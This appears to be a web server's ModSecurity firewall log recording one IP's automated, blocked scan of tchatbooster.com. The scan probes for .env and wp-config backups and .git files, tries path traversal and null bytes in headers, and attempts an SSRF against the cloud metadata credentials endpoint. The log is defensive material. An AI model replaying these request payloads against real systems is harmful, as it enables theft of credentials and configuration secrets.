[Tue May 12 04:38:59.280327 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:49882] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKSwzue9Sp-pIv_Bb61AwAAAU8"]
[Tue May 12 04:38:59.280514 2026] [security2:error] [pid 1730207:tid 1730224] [client 45.148.10.166:49882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php~"] [unique_id "agKSwzue9Sp-pIv_Bb61AwAAAU8"]
[Tue May 12 04:38:59.287625 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKSwxfeipD4uoG21FoiagAAAAw"]
[Tue May 12 04:38:59.287815 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/backend/.env"] [unique_id "agKSwxfeipD4uoG21FoiagAAAAw"]
[Tue May 12 04:38:59.336788 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.166:50102] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.development"] [unique_id "agKSw81tk6y7yBJLpJopdQAAAJI"], referer: https://tchatbooster.com/.env.development
[Tue May 12 04:38:59.337006 2026] [security2:error] [pid 1820198:tid 1820218] [client 45.148.10.166:50102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.development"] [unique_id "agKSw81tk6y7yBJLpJopdQAAAJI"], referer: https://tchatbooster.com/.env.development
[Tue May 12 04:38:59.367633 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
[Tue May 12 04:38:59.385401 2026] [core:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] AH10244: invalid URI path (/%2e%2e/%2e%2e/.env)
[Tue May 12 04:38:59.431962 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/config/.env"] [unique_id "agKSw9r1yOh9TvizeziPpAAAAEE"], referer: https://tchatbooster.com/config/.env
[Tue May 12 04:38:59.432185 2026] [security2:error] [pid 1825179:tid 1825198] [client 45.148.10.166:50152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/config/.env"] [unique_id "agKSw9r1yOh9TvizeziPpAAAAEE"], referer: https://tchatbooster.com/config/.env
[Tue May 12 04:38:59.445087 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445156 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:Referer outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445196 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445225 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445445 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445500 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445538 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.445992 2026] [security2:error] [pid 1808852:tid 1808856] [client 45.148.10.166:50136] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 31)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwxfeipD4uoG21FoibAAAAAE"], referer: https://tchatbooster.com/api/v1/health?X-App-Env=%00
[Tue May 12 04:38:59.572688 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:49950] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSws1tk6y7yBJLpJopagAAAIU"]
[Tue May 12 04:38:59.596899 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.166:49836] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/local/.env"] [unique_id "agKSwxfeipD4uoG21FoibQAAAAg"]
[Tue May 12 04:38:59.597089 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.166:49836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/local/.env"] [unique_id "agKSwxfeipD4uoG21FoibQAAAAg"]
[Tue May 12 04:38:59.618108 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:49816] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.bak"] [unique_id "agKSw81tk6y7yBJLpJopdwAAAI0"]
[Tue May 12 04:38:59.618320 2026] [security2:error] [pid 1820198:tid 1820213] [client 45.148.10.166:49816] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.bak"] [unique_id "agKSw81tk6y7yBJLpJopdwAAAI0"]
[Tue May 12 04:38:59.701705 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSwzue9Sp-pIv_Bb61BgAAAUw"], referer: https://tchatbooster.com/static../../.env
[Tue May 12 04:38:59.702017 2026] [security2:error] [pid 1730207:tid 1730221] [client 45.148.10.166:50154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKSwzue9Sp-pIv_Bb61BgAAAUw"], referer: https://tchatbooster.com/static../../.env
[Tue May 12 04:38:59.785703 2026] [security2:error] [pid 1820198:tid 1820201] [client 45.148.10.166:49958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw81tk6y7yBJLpJopcgAAAIE"]
[Tue May 12 04:38:59.903071 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKSwzue9Sp-pIv_Bb61CAAAAU4"]
[Tue May 12 04:38:59.903267 2026] [security2:error] [pid 1730207:tid 1730223] [client 45.148.10.166:49910] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/refs/heads/master"] [unique_id "agKSwzue9Sp-pIv_Bb61CAAAAU4"]
[Tue May 12 04:38:59.948821 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKSw9r1yOh9TvizeziPogAAAEM"], referer: https://tchatbooster.com/.env
[Tue May 12 04:38:59.975954 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKSw9r1yOh9TvizeziPpQAAAEM"], referer: https://tchatbooster.com/wp-config.php.bak
[Tue May 12 04:38:59.976176 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.166:50024] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php.bak"] [unique_id "agKSw9r1yOh9TvizeziPpQAAAEM"], referer: https://tchatbooster.com/wp-config.php.bak
[Tue May 12 04:39:00.003176 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwxfeipD4uoG21FoiZQAAABc"]
[Tue May 12 04:39:00.028284 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKSxBfeipD4uoG21FoibwAAABc"]
[Tue May 12 04:39:00.028482 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.166:49976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.git/HEAD"] [unique_id "agKSxBfeipD4uoG21FoibwAAABc"]
[Tue May 12 04:39:00.036012 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSxM1tk6y7yBJLpJopegAAAII"], referer: https://tchatbooster.com/_next/image?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 04:39:00.036800 2026] [security2:error] [pid 1820198:tid 1820202] [client 45.148.10.166:50186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/_next/image"] [unique_id "agKSxM1tk6y7yBJLpJopegAAAII"], referer: https://tchatbooster.com/_next/image?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F&w=1200&q=75
[Tue May 12 04:39:00.129744 2026] [security2:error] [pid 1730207:tid 1730232] [client 45.148.10.166:49894] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKSwjue9Sp-pIv_Bb60_QAAAVc"]
